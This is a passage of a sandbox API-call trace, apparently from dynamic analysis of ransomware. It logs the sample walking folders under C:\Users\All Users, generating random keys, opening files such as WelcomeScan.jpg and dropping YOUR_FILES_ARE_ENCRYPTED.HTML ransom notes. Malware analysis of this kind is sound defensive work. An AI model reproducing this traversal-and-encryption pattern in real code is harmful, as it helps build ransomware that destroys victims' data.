(lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.038] GetProcessHeap () returned 0x270000 [0170.038] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.038] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned 50 [0170.038] GetProcessHeap () returned 0x270000 [0170.038] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.038] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan" [0170.038] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*" [0170.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc1cb960, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1cb960, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.039] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned 66 [0170.039] lstrcmpW (lpString1="WelcomeScan.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.039] PathFindExtensionW (pszPath="WelcomeScan.jpg") returned=".jpg" [0170.039] lstrlenW (lpString=".jpg") returned 4 [0170.039] PathFindExtensionW (pszPath="WelcomeScan.jpg") returned=".jpg" [0170.039] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0170.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0170.039] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0170.039] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.039] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.039] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0170.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.040] GetProcessHeap () returned 0x270000 [0170.040] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.040] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0170.040] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.041] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.041] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0170.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.041] GetProcessHeap () returned 0x270000 [0170.041] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0170.047] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc") returned 40 [0170.048] GetProcessHeap () returned 0x270000 [0170.048] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0170.049] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc" [0170.049] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*" [0170.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc1f1ac0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1f1ac0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.050] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned 49 [0170.050] GetProcessHeap () returned 0x270000 [0170.050] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.053] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles" [0170.053] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*" [0170.053] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.053] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.054] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0170.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.054] GetProcessHeap () returned 0x270000 [0170.055] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.055] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0170.055] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.055] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.055] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0170.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.055] GetProcessHeap () returned 0x270000 [0170.056] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0170.057] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0170.057] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.057] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0170.066] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0170.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.066] GetProcessHeap () returned 0x270000 [0170.068] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0170.072] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive") returned 41 [0170.072] GetProcessHeap () returned 0x270000 [0170.072] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0170.074] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive") returned="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive" [0170.074] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\*" [0170.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xcc23dd80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc23dd80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0170.075] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup") returned 47 [0170.075] GetProcessHeap () returned 0x270000 [0170.075] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.076] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup") returned="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup" [0170.076] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*" [0170.076] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xcc217c20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc217c20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.076] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0170.076] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.076] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.076] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0170.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft onedrive\\setup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.077] GetProcessHeap () returned 0x270000 [0170.078] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.078] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0170.078] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.078] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0170.078] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0170.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft onedrive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.079] GetProcessHeap () returned 0x270000 [0170.080] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0170.080] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache") returned 36 [0170.080] GetProcessHeap () returned 0x270000 [0170.080] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0170.080] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache") returned="\\\\?\\C:\\Users\\All Users\\Package Cache" [0170.080] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*" [0170.080] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd013d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0170.080] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88") returned 77 [0170.080] GetProcessHeap () returned 0x270000 [0170.080] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.081] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88" [0170.081] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*" [0170.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cb75910, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.081] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages") returned 86 [0170.081] GetProcessHeap () returned 0x270000 [0170.081] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.093] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages" [0170.093] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*" [0170.093] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.093] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.094] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Patch", cAlternateFileName="")) returned 1 [0170.094] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch") returned 92 [0170.095] GetProcessHeap () returned 0x270000 [0170.095] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.095] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch" [0170.096] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*" [0170.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.096] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.096] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc23dd80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc23dd80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x86", cAlternateFileName="")) returned 1 [0170.096] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86") returned 96 [0170.096] GetProcessHeap () returned 0x270000 [0170.096] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0170.098] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\All Users\\Package 